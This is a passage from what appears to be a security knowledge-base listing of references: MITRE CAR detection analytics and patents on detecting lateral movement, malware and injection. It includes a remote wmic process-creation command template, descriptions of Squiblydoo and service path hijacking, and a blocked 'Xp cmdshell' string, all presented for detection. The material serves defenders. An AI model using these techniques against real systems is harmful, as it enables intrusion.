  • "CAR-2014-03-005: Remotely Launched Executables via Services"

Usage (5)

kb-abstract

  • "Adversaries can use Windows Management Instrumentation (WMI) to move laterally by launching executables remotely. For adversaries to achieve this, they must open a WMI connection to a remote host. This RPC activity is currently detected by CAR-2014-11-007. After the WMI connection has been initialized, a process can be remotely launched using the command: wmic /node:"<hostname>" process call create "<command line>", which is detected via CAR-2016-03-002.

    This leaves artifacts at both a network (RPC) and process (command line) level. When wmic.exe (or the schtasks API) is used to remotely create processes, Windows uses RPC (135/tcp) to communicate with the the remote machine.

    After RPC authenticates, the RPC endpoint mapper opens a high port connection, through which the schtasks Remote Procedure Call is actually implemented. With the right packet decoders, or by looking for certain byte streams in raw data, these functions can be identified.

    When the command line is executed, it has the parent process of C:\windows\system32\wbem\WmiPrvSE.exe. This analytic looks for these two events happening in sequence, so that the network connection and target process are output."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-12-001: Remotely Launched Executables via WMI - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-12-001: Remotely Launched Executables via WMI"

Usage (5)

kb-abstract

  • "An adversary can move laterally using the schtasks command to remotely schedule tasks. Although these events can be detected with command line analytics CAR-2013-08-001, it is possible for an adversary to use the API directly, via the Task Scheduler GUI or with a scripting language such as PowerShell. In this cases, an additional source of data becomes necessary to detect adversarial behavior. When scheduled tasks are created remotely, Windows uses RPC (135/tcp) to communicate with the Task Scheduler on the remote machine. Once an RPC connection is established (CAR-2014-05-001), the client communicates with the Scheduled Tasks endpoint, which runs within the service group netsvcs. With packet capture and the right packet decoders or byte-stream based signatures, remote invocations of these functions can be identified.

    Certain strings can be identifiers of the schtasks, by looking up the interface UUID of ITaskSchedulerService in different formats

    * UUID 86d35949-83c9-4044-b424-db363231fd0c (decoded)
    * Hex 49 59 d3 86 c9 83 44 40 b4 24 db 36 32 31 fd 0c (raw)
    * ASCII IYD@$621 (printable bytes only)

    This identifier is present three times during the RPC request phase. Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2015-04-002: Remotely Scheduled Tasks via Schtasks - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2015-04-002: Remotely Scheduled Tasks via Schtasks"

Usage (5)

kb-author

  • "Christopher Dixon, Thomas Pinckney"

rdfs:label

  • "Reference - Reputation of an entity associated with a content item"

kb-reference-of

kb-reference-title

  • "Reputation of an entity associated with a content item"

Usage (5)

kb-author

  • "campus.barracuda.com"

kb-mitre-analysis

  • "Inbound corporate traffic SMTP traffic on port 25 can be routed through Barracuda Email Security Gateway before reaching the corporate mail server, acting as a traffic filter based on reverse DNS lookups and a denylist for blocking domains."

rdfs:label

  • "Reference - Reverse DNS Blocking - Barracuda Networks"

kb-reference-of

kb-reference-title

  • "Reverse DNS Blocking"

Usage (5)

kb-abstract

  • "Adversaries may find it necessary to use Dyanamic-link Libraries (DLLs) to evade defenses. One way these DLLs can be "executed" is through the use of the built-in Windows utility RunDLL32, which allows a user to execute code in a DLL, providing the name and optional arguments to an exported entry point. Windows uses RunDll32 legitimately in its normal operation, but with a proper baseline and understanding of the environment, monitoring its usage could be fruitful."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-03-006: RunDLL32.exe monitoring - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-03-006: RunDLL32.exe monitoring"

Usage (5)

kb-abstract

  • "When /SAFESEH is specified, the linker will only produce an image if it can also produce a table of the image's safe exception handlers. This table specifies for the operating system which exception handlers are valid for the image."

kb-author

  • "Mike Blome, Saisang Cai, Colin Robertson, Mike Jones, NextTurn, Gordon Hogenson"

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - /SAFESEH (Image has Safe Exception Handlers) - Microsoft Docs"

kb-reference-of

kb-reference-title

  • "/SAFESEH (Image has Safe Exception Handlers)"

Usage (5)

kb-abstract

  • "An adversary needs to gain access to other hosts to move throughout an environment. In many cases, this is a twofold process. First, a file is remotely written to a host via an SMB share (detected by CAR-2013-05-003). Then, a variety of Execution techniques can be used to remotely establish execution of the file or script. To detect this behavior, look for files that are written to a host over SMB and then later run directly as a process or in the command line arguments. SMB File Writes and Remote Execution may happen normally in an environment, but the combination of the two behaviors is less frequent and more likely to indicate adversarial activity.

    This can possibly extend to more copy protocols in order to widen its reach, or it could be tuned more finely to focus on specific program run locations (e.g. %SYSTEMROOT%\system32) to gain a higher detection rate."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-05-005: SMB Copy and Execution - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-05-005: SMB Copy and Execution"

Usage (5)

kb-abstract

  • "Server Message Block (SMB) is used by Windows to allow for file, pipe, and printer sharing over port 445/tcp. It allows for enumerating, and reading from and writing to file shares for a remote computer. Although it is heavily used by Windows servers for legitimate purposes and by users for file and printer sharing, many adversaries also use SMB to achieve Lateral Movement. Looking at this activity more closely to obtain an adequate sense of situational awareness may make it possible to detect adversaries moving between hosts in a way that deviates from normal activity. Because SMB traffic is heavy in many environments, this analytic may be difficult to turn into something that can be used to quickly detect an APT. In some cases, it may make more sense to run this analytic in a forensic fashion. Looking through and filtering its output after an intrusion has been discovered may be helpful in identifying the scope of compromise.

    Output Description:
    The source, destination, content, and time of each event."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-01-003: SMB Events Monitoring - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-01-003: SMB Events Monitoring"

Usage (5)

kb-abstract

  • "Account usage within SMB can be used to identify compromised credentials, and the hosts accessed with them.

    This analytic monitors SMB activity that deals with user activity rather than file activity."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-09-003: SMB Session Setups - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-09-003: SMB Session Setups"

Usage (5)

kb-abstract

  • "An SMB write can be an indicator of lateral movement, especially when combined with other information such as execution of that written file. Named pipes are a subset of SMB write requests. Named pipes such as msftewds may not be alarming; however others, such as lsarpc, may.

    Monitoring SMB write requests still creates some noise, particularly with named pipes. As a result, SMB is now split between writing named pipes and writing other files."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-03-001: SMB Write Request - NamedPipes - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-03-001: SMB Write Request - NamedPipes"

Usage (5)

kb-abstract

  • "As described in CAR-2013-01-003, SMB provides a means of remotely managing a file system. Adversaries often use SMB to move laterally to a host. SMB is commonly used to upload files. It may be used for staging in Exfiltration or as a Lateral Movement technique. Unlike SMB Reads, SMB Write requests typically require an additional level of access, resulting in less activity. Focusing on SMB Write activity narrows the field to find techniques that actively change remote hosts, instead of passively reading files."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-05-003: SMB Write Request - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-05-003: SMB Write Request"

Usage (5)

kb-abstract

  • "SNMP, or Simple Network Management Protocol, is a protocol and a standard that is supported by just about any managed network-connected hardware. There are three widely deployed versions: SNMP v1, v2c (most commonly used), and v3. SNMP is typically utilized read-only, but supports read/write, and by default utilized port 161. SNMP exposes management data in the form of ‘variables’, which are organized in what is known as a MIB, or “Management Information Base”. A MIB essentially describes the variables available on a given system, each of which can be remotely queried via SNMP."

kb-organization

  • "Device 42"

rdfs:label

  • "Reference - SNMP - Network Auto-Discovery"

kb-reference-of

kb-reference-title

  • "SNMP - Network Auto Discovery"

Usage (5)

kb-abstract

  • "A credential caching system includes receiving a set of authentication credentials, storing the set of authentication credentials in a credential cache memory, wherein the credential cache memory is coupled with a management controller, and supplying the set of authentication credentials for automatic authentication during a reset or reboot. In the event of a security breach, the credential caching system clears the set of authentication credentials from the credential cache memory so that the set of authentication credentials may no longer be used for a reset or reboot."

kb-author

  • "Muhammed K. JaberMukund P. KhatriKevin T. MarksDon Charles McCall"

kb-mitre-analysis

  • ""

kb-organization

  • "Dell Products LP"

rdfs:label

  • "Reference - Secure caching of server credentials - Dell Products LP"

kb-reference-of

kb-reference-title

  • "Secure caching of server credentials"

Usage (5)

kb-abstract

  • "The example implementation demonstrates the ability to perform passive inspection of encrypted TLS connections. The question of whether or not to perform such an inspection is complex. There are important tradeoffs between traffic security and traffic visibility that each organization should consider. Some organizations prefer to decrypt internal TLS traffic, so it can be inspected to detect attacks that may be hiding within encrypted connections. Such inspection can detect intrusion, malware, and fraud, and can conduct troubleshooting, forensics, and performance monitoring. For these organizations, TLS inspection may serve as both a standard practice and a critical component of their threat detection and service assurance strategies."

kb-author

  • "NIST"

rdfs:label

  • "Reference - Securing Web Transactions TLS Server Certificate Management - Appendix A Passive Inspection"

kb-reference-of

kb-reference-title

  • "Securing Web Transactions TLS Server Certificate Management - Appendix A Passive Inspection"

Usage (5)

kb-abstract

  • "A security system with methodology for interprocess communication control is described. In one embodiment, a method for controlling interprocess communication is provided that includes steps of: defining rules indicating which system services a given application can invoke; trapping an attempt by a particular application to invoke a particular system service; identifying the particular application that is attempting to invoke the particular system service; and based on identity of the particular application and on the rules indicating which system services a given application can invoke, blocking the attempt when the rules indicate that the particular application cannot invoke the particular system service."

kb-author

  • "Gregor Freund"

kb-mitre-analysis

  • "This patent describes a technique for monitoring interprocess communications to prevent malicious applications from requesting system services. API calls are monitored to detect malicious applications attempting to open a communication channel (port) to access system services or sending messages to other applications using user32 API functions. These requests are examined against an external rules engine or whitelist, matches deny or block access and produce an error message such as connection refused or service not available."

kb-organization

  • "Check Point Software Tech Inc"

rdfs:label

  • "Reference - Security System with Methodology for Interprocess Communication Control - Check Point Software Tech Inc"

kb-reference-of

kb-reference-title

  • "Security System with Methodology for Interprocess Communication Control"

Usage (5)

kb-abstract

  • "Security vulnerability information aggregation techniques are disclosed. Vulnerability information associated with one or more security vulnerabilities is obtained from multiple sources and aggregated into respective unified vulnerability definitions for the one or more security vulnerabilities. Aggregation may involve format conversion, content aggregation, or both in some embodiments. Unified vulnerability definitions may be distributed to vulnerability information consumers in accordance with consumer-specific policies. Storage of vulnerability information received from the sources may allow the aggregation process to be performed on existing vulnerability information “retro-actively”. Related data structures and Graphical User Interfaces (GUIs) are also disclosed."

kb-author

  • "Christophe Gustave, Stanley Taihai Chow, Douglas Wiemer"

kb-organization

  • "Nokia Technologies Oy"

rdfs:label

  • "Reference - Security vulnerability information aggregation"

kb-reference-of

kb-reference-title

  • "Security vulnerability information aggregation"

Usage (5)

kb-abstract

  • "Adversaries may modify the binary file for an existing service to achieve Persistence while potentially evading defenses. If a newly created or modified runs as a service, it may indicate APT activity. However, services are frequently installed by legitimate software. A well-tuned baseline is essential to differentiating between benign and malicious service modifications."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-02-001: Service Binary Modifications - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-02-001: Service Binary Modifications"

Usage (5)

kb-abstract

  • "New executables that are started as a service are suspicious. This analytic looks for anomalous service executables."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-09-005: Service Outlier Executables - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-09-005: Service Outlier Executables"

Usage (5)

kb-abstract

  • "According to ATT&CK, an adversary may escalate privileges by intercepting the search path for legitimately installed services. As a result, Windows will launch the target executable instead of the desired binary and command line. This can be done when there are spaces in the binary path and the path is unquoted. Search path interception should never happen legitimately and will likely be the result of an adversary abusing a system misconfiguration. With a few regular expressions, it is possible to identify the execution of services with intercepted search paths."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-07-001: Service Search Path Interception - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-07-001: Service Search Path Interception"

Usage (5)

kb-abstract

  • "Windows runs the Service Control Manager (SCM) within the process services.exe. Windows launches services as independent processes or DLL loads within a svchost.exe group. To be a legitimate service, a process (or DLL) must have the appropriate service entry point SvcMain. If an application does not have the entry point, then it will timeout (default is 30 seconds) and the process will be killed.

    To survive the timeout, adversaries and red teams can create services that direct to cmd.exe with the flag /c, followed by the desired command. The /c flag causes the command shell to run a command and immediately exit. As a result, the desired program will remain running and it will report an error starting the service. This analytic will catch that command prompt instance that is used to launch the actual malicious executable. Additionally, the children and descendants of services.exe will run as a SYSTEM user by default. Thus, services are a convenient way for an adversary to gain Persistence and Privilege Escalation."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2014-05-002: Services launching Cmd - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-05-002: Services launching Cmd"

Usage (5)

kb-abstract

  • "Multiple users logged into a single machine at the same time, or even within the same hour, do not typically occur in networks we have observed.

    Logon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista. Logon types 2, 3, 9 and 10 are of interest. For more details see the Logon Types table on Microsoft's Audit Logon Events page."

kb-author

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-02-008: Simultaneous Logins on a Host - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-02-008: Simultaneous Logins on a Host"

Usage (5)

kb-abstract

  • "Techniques for sinkholing bad network domains by registering the bad network domains on the Internet are provided. In some embodiments, sinkholing bad network domains by registering the bad network domains on the Internet includes determining a network domain is a bad network domain, in which the bad network domain is determined to be associated with an identified malware (e.g., malware that has been identified and has been determined to be associated with the bad domain), and the bad network domain is sinkholed by registering the bad network domain with a sinkholed IP address; and identifying a host that is infected with the identified malware based on an attempt by the host to connect to the sinkholed IP address."

kb-author

  • "Huagang Xie; Wei Xu; Nir Zuk"

kb-mitre-analysis

  • "This patent describes a technique to identify bad domains that are associated with malware and sinkhole the bad domain. Bad domains are identified by receiving malware samples and executing the malware sample in a virtual execution environment to identify network domains that the malware sample attempts to connect to during execution. Network domains that are identified during malware execution are then generated into signatures to identity bad domains for other hosts. Once identified, the bad domains are sinkholed by translating the domain to a valid IP address that is associated with a device controlled by a cloud security provider."

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - Sinkholing bad network domains by registering the bad network domains on the internet - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "Sinkholing bad network domains by registering the bad network domains on the internet"

Usage (5)

kb-abstract

  • "To analyze open-source code at a large scale, a security domain graph language ("GL") has been created that functions as a vulnerability description language and facilitates program analysis queries. The SGL facilitates building and maintaining a graph database to catalogue vulnerabilities found in open-source components. This graphical database can be accessed via a database interface directly or accessed by an agent that interacts with the database interface. To build the graph database, a database interface processes an open-source component and creates graph structures which represent relationships present in the open-source component. The database interface transforms a vulnerability description into a canonical form based on a schema for the graph database and updates the database based on a determination of whether the vulnerability is a duplicate. This ensures quality and consistency of the vulnerability dataset maintained in the graph database."

kb-author

  • "Darius Tsien Wei FOO, Ming Yi ANG, Asankhaya Sharma, Jie Shun YEO"

kb-organization

  • "Veracode, Inc."

rdfs:label

  • "Reference - Software vulnerability graph database"

kb-reference-of

kb-reference-title

  • "Software vulnerability graph database"

Usage (5)

kb-abstract

  • "Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. It can be seen by looking for regsvr32.exe executions that load the scrobj.dll (which execute the COM scriptlet) or, if that is too noisy, those that also load content directly via HTTP or HTTPS."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-04-003: Squiblydoo - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-04-003: Squiblydoo"

Usage (5)

kb-abstract

  • "In our previous blog, we saw how arbitrary code execution resulting from stack-buffer overflows can be partly mitigated by marking segments of memory as non-executable, a technology known as Execshield. However stack-buffer overflow exploits can still effectively overwrite the function return address, which leads to several interesting exploitation techniques like ret2libc, ret2gets, and ret2plt. With all of these methods, the function return address is overwritten and attacker controlled code is executed when the program control transfers to overwritten address on the stack."

kb-author

  • "Huzaifa Sidhpurwala"

kb-mitre-analysis

  • ""

kb-organization

  • "Red Hat"

rdfs:label

  • "Reference - Security Technologies: Stack Smashing Protection (StackGuard) - Red Hat"

kb-reference-of

kb-reference-title

  • "Security Technologies: Stack Smashing Protection (StackGuard)"

Usage (5)

kb-abstract

  • "Malicious actors may rename built-in commands or external tools, such as those provided by SysInternals, to better blend in with the environment. In those cases, the file path name is arbitrary and may blend in well with the background. If the arguments are closely inspected, it may be possible to infer what tools are running and understand what an adversary is doing. When any legitimate software shares the same command lines, it must be whitelisted according to the expected parameters."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-07-001: Suspicious Arguments - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-07-001: Suspicious Arguments"

Usage (5)

kb-abstract

  • "In Windows, files should never execute out of certain directory locations. Any of these locations may exist for a variety of reasons, and executables may be present in the directory but should not execute. As a result, some defenders make the mistake of ignoring these directories and assuming that a process will never run from one. There are known TTPs that have taken advantage of this fact to go undetected. This fact should inform defenders to monitor these directories more closely, knowing that they should never contain running processes."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-05-002: Suspicious Run Locations - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-05-002: Suspicious Run Locations"

Usage (5)

kb-abstract

  • "Techniques for synchronizing a honey network configuration to reflect a target network environment are disclosed. In some embodiments, a system for synchronizing a honey network configuration to reflect a target network environment includes a device profile data store that includes a plurality of attributes of each of a plurality of devices in the target network environment; a virtual machine (VM) image library that includes one or more VM images; and a virtual clone manager executed on a processor that instantiates a virtual clone of one or more devices in the target enterprise network using a VM image selected from the VM image library that is customized based on one or more attributes for a target device in the device profile data store."

kb-author

  • "Taylor Ettema, Huagang Xie"

kb-mitre-analysis

  • ""

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - Synchronizing a honey network configuration to reflect a target network environment - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "Synchronizing a honey network configuration to reflect a target network environment"

Usage (5)

kb-abstract

  • "A system for identifying the presence of ransomware on a network, including a plurality of resources, interconnected to form a network and at least one decoy drive.The decoy drive includes a plurality of decoy files to be encrypted by the ransomware, and wherein the decoy drive continuously provides the decoy files thereby continuously occupying the ransomware."

kb-author

  • "Doron Kolton; Rami Mizrahi; Omer Zohar; Benny Ben-Rabi; Alex Barbalat; Shlomi Gabai"

kb-mitre-analysis

  • ""

kb-organization

  • "Fidelis Cybersecurity Solutions Inc"

rdfs:label

  • "Reference - System and a method for identifying the presence of malware and ransomware using mini-traps set at network endpoints - Fidelis Cybersecurity Solutions Inc"

kb-reference-of

kb-reference-title

  • "System and a method for identifying the presence of malware and ransomware using mini-traps set at network endpoints"

Usage (5)

kb-abstract

  • "The present invention utilizes computer vision technologies to identify potentially malicious URLs and executable files in a computing device. In one embodiment, a Siamese convolutional neural network is trained to identify the relative similarity between image versions of two strings of text. After the training process, a list of strings that are likely to be utilized in malicious attacks are provided (e.g., legitimate URLs for popular websites). When a new string is received, it is converted to an image and then compared against the image of list of strings. The relative similarity is determined, and if the similarity rating falls below a predetermined threshold, an alert is generated indicating that the string is potentially malicious."

kb-author

  • "Jonathan Woodbridge; Anjum Ahuja; Daniel Grant"

kb-mitre-analysis

  • "This patent describes a mechanism to detect homoglyph strings that involves training a Siamese convolutional neural network to compare images of strings. Strings of legitimate URLs for websites along with known suspicious stings are converted to images during the training process to create an index. New strings are converted to images and then compared to the index for similarity, if the string deviates beyond a threshold an alert is triggered."

kb-organization

  • "Endgame Inc"

rdfs:label

  • "Reference - System and method for detecting homoglyph attacks with a siamese convolutional neural network - Endgame Inc"

kb-reference-of

kb-reference-title

  • "System and method for detecting homoglyph attacks with a siamese convolutional neural network"

Usage (5)

kb-abstract

  • "In the embodiments described herein, a malicious code detection module identifies potentially malicious instructions in memory of a computing device. The malicious code detection module examines the call stack for each thread running within the operating system of the computing device. Within each call stack, the malicious code detection module identifies the originating module for each stack frame and determines whether the originating module is backed by an image on disk. If an originating module is not backed by an image on disk, the thread containing that originating module is flagged as potentially malicious, execution of the thread optionally is suspended, and an alert is generated for the user or administrator."

kb-author

  • "Joseph W. Desimone"

kb-mitre-analysis

  • ""

kb-organization

  • "Endgame Inc"

rdfs:label

  • "Reference - System and method for detecting malware injected into memory of a computing device - Endgame Inc"

kb-reference-of

kb-reference-title

  • "System and method for detecting malware injected into memory of a computing device"

Usage (5)

kb-abstract

  • "A system and software for identifying the change of user behavior on a website includes analyzing the actions of users on a website comprising a plurality of fields or input parameters that identify the actions performed on a website including fields related to previous actions by that user or other users of the website. The fields or input parameters are represented in a vector format where vectors represent different sessions of activity on the website, pages of the website, users of the website, or other attributes of the use of a website. Analysis is performed to determine if new sessions are similar or dissimilar to previously known sessions and if a session is converging or diverging from known sessions based on the velocity and direction of the velocity of the vectors in the vector space."

kb-author

  • "Mike Eynon; Laura Mather; Erik Westland; Jim Lloyd"

kb-mitre-analysis

  • "This patent describes a technique for detecting fraudulent behavior on a website. Website behavior is mapped to build a multidimensional representation of user actions on a website that is updated as additional actions are recorded. Example actions on a website that are recorded include clicks by a user on the website and entering data into forms. Current behavior is compared against baseline recorded behavior and if current behavior deviates above a threshold, an alert is issued."

kb-organization

  • "Silver Tail Systems"

rdfs:label

  • "Reference - System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Velocity Analysis - Silver Tail Systems"

kb-reference-of

kb-reference-title

  • "System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Velocity Analysis"

Usage (5)

kb-abstract

  • "A system for identifying the presence of advanced persistent threats on a network including a plurality of resources, interconnected to form a network, at least one decoy resource, at least one mini-trap installed on at least one of the plurality of resources and functionally associated with at one of the at least one decoy resource, the at least one mini-trap comprising deceptive information directing malware accessing the at least one mini-trap to the decoy resource associated therewith, and a manager node forming part of the network, locally or remotely, and configured to manage placement of the at least one mini-trap on the at least one of the plurality of resources and association between the at least one mini-trap and the decoy resource associated therewith."

kb-author

  • "Doron Kolton; Rami Mizrahi; Omer Zohar; Benny Ben-Rabi; Alex Barbalat; Shlomi Gabai"

kb-mitre-analysis

  • "Questionable or all files (as determined by the enterprise) are forwarded to the decoy network. Using a manager node user interface, you can setup fake information (ex. IP address of a decoy FTP server)
    and deploy decoy physical or virtual endpoints."

kb-organization

  • "Fidelis Cybersecurity Solutions Inc"

rdfs:label

  • "Reference - System and method for identifying the presence of malware using mini-traps set at network endpoints - Fidelis Cybersecurity Solutions Inc"

kb-reference-of

kb-reference-title

  • "System and method for identifying the presence of malware using mini-traps set at network endpoints"

Usage (5)

kb-abstract

  • "A computer implemented method for preventing SQL injection attacks comprises intercepting a web request associated with a web service at a first software hook in a first web service execution context, persisting at least a portion of the intercepted web request in a storage location associated with the first software hook and accessible to at least one additional execution context, intercepting a database query generated by at least one web service processing operation at a second software hook associated with the execution of the query, wherein the query is generated in response to the intercepted web request and the second hook retrieves the persisted portion of the intercepted web request, comparing a portion of the persisted portion of the intercepted web request with at least a portion of the intercepted database query, and determining, prior to the query being executed, whether the query corresponds to a potential SQL injection attack."

kb-author

  • "Derek A. Soeder"

kb-mitre-analysis

  • "This patent describes a technique for detecting SQL injection attacks. Software hooks are installed in a web service or application to intercept function calls, events, or messages that are passed between software components. Intercepted database queries associated with a web request are analyzed character by character and if it contains a character that would modify the syntax the query is rejected or sanitized. Security rules and policies may also determine rejection. For example, an administrator or developer may implement a rule that rejects any database query that is excessively long or that contains a particular string, such as "Xp cmdshell"."

kb-organization

  • "Cylance Inc"

rdfs:label

  • "Reference - System and method for internet security - Cylance Inc"

kb-reference-of

kb-reference-title

  • "System and method for internet security"

Usage (5)

kb-abstract

  • "In an embodiment of the invention, a system for assessing vulnerabilities includes: a security management system; a network device in a system under test (SUT), wherein the network device is privy to traffic in the SUT; and wherein the SMS is privy to traffic that is known by the network device and/or to one or more traffic observations that is known by the network device."

kb-author

  • "Scott Parcel"

kb-organization

  • "Cenzic Inc, Trustwave Holdings Inc"

rdfs:label

  • "Reference - System and method for managed security assessment and mitigation"

kb-reference-of

kb-reference-title

  • "System and method for managed security assessment and mitigation"

Usage (5)

kb-abstract

  • "A computer readable storage medium has instructions for execution on a computer. The instructions monitor transactions between a server and a set of clients. An evaluation of session indicators associated with the transactions is performed. Individual sessions between the server and individual clients of the plurality of clients are isolated in response to the evaluation."

kb-author

  • "Matt Frantz; Andreas Wittenstein; Mike Eynon; Laura Mather; Jim Lloyd; James Schumacher; Duane Murphy"

kb-mitre-analysis

  • "This patent describes a technique for detecting man-in-the-browser attacks. Current user session data is compared with the average user session that is based on collected data representing average values across all user sessions over a data-collection period. User session data includes average time between clicks and the order in which website pages are viewed. The comparisons are combined to generate a score that indicates the likelihood that the current session is a man-in-the-browser attack."

kb-organization

  • "EMC IP Holding Co LLC"

rdfs:label

  • "Reference - System and Method for Network Security Including Detection of Attacks Through Partner Websites - EMC IP Holding Co LLC"

kb-reference-of

kb-reference-title

  • "System and Method for Network Security Including Detection of Attacks Through Partner Websites"

Usage (5)

kb-abstract

  • "A method and system for remediating a process hollowing intrusion on a user device comprising detecting a process starting on the user device, preparing the process to monitor Application Programming Interface (API) calls between the process and an operating system of the user device, determining whether the process is associated with a process hollowing intrusion based on information associated with the process and/or the API calls, and executing security policies against the process associated with the process hollowing intrusion. In examples, it is determined whether the child process is associated with a process hollowing intrusion in response to determining whether one or more API calls associated with known process hollowing intrusions modify executable memory of and/or modify an entry point address of the child process."

kb-author

  • "Jeffrey Albin Kraemer, Paul Matthew Drapeau"

kb-mitre-analysis

  • ""

kb-organization

  • "Carbon Black Inc"

rdfs:label

  • "Reference - System and Method for Process Hollowing Detection - Carbon Black Inc"

kb-reference-of

kb-reference-title

  • "System and Method for Process Hollowing Detection"

Usage (5)

kb-abstract

  • "A system and method for providing an actively invalidated client-side network resource cache are disclosed. A particular embodiment includes: a client configured to request, for a client application, data associated with an identifier from a server; the server configured to provide the data associated with the identifier and to establish a queue associated with the identifier at a scalable message queuing system, the client being configured to subscribe to the queue at the scalable message queuing system to receive invalidation information associated with the data; the server being further configured to signal the queue of an invalidation event associated with the data; the scalable message queuing system being configured to convey information indicative of the invalidation event to the client; and the client being further configured to re-request the data associated with the identifier from the server upon receipt of the information indicative of the invalidation event."

kb-author

  • "Jon Watte"

kb-mitre-analysis

  • ""

kb-organization

  • "IMVU"

rdfs:label

  • "Reference - System and method for providing an actively invalidated client-side network resource cache - IMVU"

kb-reference-of

kb-reference-title

  • "System and method for providing an actively invalidated client-side network resource cache"

Usage (5)

kb-abstract

  • "In the embodiments described herein, a malicious code detection module identifies potentially malicious instructions in volatile memory of a computing device before the instructions are executed. The malicious code detection module identifies an executable file, such as an .exe file, in memory, validates one or more components of the executable file against the same file stored in non-volatile storage, and issues an alert if the validation fails."

kb-author

  • "Joseph W. Desimone"

kb-mitre-analysis

  • ""

kb-organization

  • "Endgame Inc"

rdfs:label

  • "Reference - System and method for validating in-memory integrity of executable files to identify malicious activity - Endgame Inc"

kb-reference-of

kb-reference-title

  • "System and method for validating in-memory integrity of executable files to identify malicious activity"

Usage (5)

kb-abstract

  • "Embodiments of the present invention are directed to a method and system for automated risk analysis. The method includes accessing host configuration information of a host and querying a vulnerability database based on the host configuration information. The method further includes receiving a list of vulnerabilities and accessing a plurality of vulnerability scores. The list of vulnerabilities corresponds to vulnerabilities of the host. Vulnerabilities can be removed from the list based on checking for installed fixes corresponding to vulnerability. A composite risk score can then be determined for the host a nd each software product of the host based on the plurality of vulnerability scores. An aggregate risk score can then be determined for the host and each software product of the host based on the plurality of vulnerability scores."

kb-author

  • "Matthew Cruz Elder, Darrell Martin Kienzle, Pratyusa K. Manadhata, Ryan Kumar Persaud"

kb-organization

  • "CA Inc"

rdfs:label

  • "Reference - System and method for vulnerability risk analysis"

kb-reference-of

kb-reference-title

  • "System and method for vulnerability risk analysis"

Usage (5)

kb-abstract

  • "A system is connected to a plurality of user devices coupled to an enterprise's network. The system continuously collects, stores, and analyzes forensic data related to the enterprise's network. Based on the analysis, the system is able to determine normal behavior of the network and portions thereof and thereby identify abnormal behaviors within the network. Upon identification of an abnormal behavior, the system determines whether the abnormal behavior relates to a security incident. Upon determining a security incident in any portion of the enterprise's network, the system extracts forensic data respective of the security incident and enables further assessment of the security incident as well as identification of the source of the security incident. The system provides real-time damage assessment respective of the security incident as well as the security incident's attributions."

kb-author

  • "Gil BARAK; Shai MORAG"

kb-mitre-analysis

  • "This patent describes detecting abnormal behavior related to a security incident by collecting and analyzing forensic data in real time. Forensic data may include:

    * URLs visited
    * data downloaded or streamed
    * messages received and sent
    * amount of memory used for processing

    The data is then analyzed according to a set of dynamically created rules to determine normal behavior patterns associated with the network or user devices. Anomalies between current behavior and normal behavior patterns trigger an alert."

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - System and method thereof for identifying and responding to security incidents based on preemptive forensics - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "System and method thereof for identifying and responding to security incidents based on preemptive forensics"

Usage (5)

kb-abstract

